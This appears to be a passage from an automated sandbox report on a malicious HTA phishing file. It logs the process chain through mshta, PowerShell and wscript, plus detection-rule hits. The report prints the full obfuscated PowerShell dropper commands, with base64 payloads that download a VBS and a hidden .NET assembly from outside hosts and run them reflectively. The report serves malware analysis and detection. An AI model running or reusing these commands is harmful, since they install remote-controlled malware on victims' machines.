            Source: Process Memory Space: powershell.exe PID: 7136, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6004, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04720F6D7_2_04720F6D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_03051D6A9_2_03051D6A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_03051C9F9_2_03051C9F
            Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2254
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2254Jump to behavior
            Source: Process Memory Space: powershell.exe PID: 7136, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6004, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.phis.expl.evad.winHTA@17/19@2/2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\seemethebestthingswithgreatneedswithgoodformewith[1].tiffJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2876:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pljapn4x.hno.ps1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs"
            Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: greatthingswithmegood.htaReversingLabs: Detection: 21%
            Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\greatthingswithmegood.hta"
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2C04.tmp" "c:\Users\user\AppData\Local\Temp\ly0yjdqb\CSC746F8121F2314519843BE09F69B09E4D.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenTJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2C04.tmp" "c:\Users\user\AppData\Local\Temp\ly0yjdqb\CSC746F8121F2314519843BE09F69B09E4D.TMP"Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5I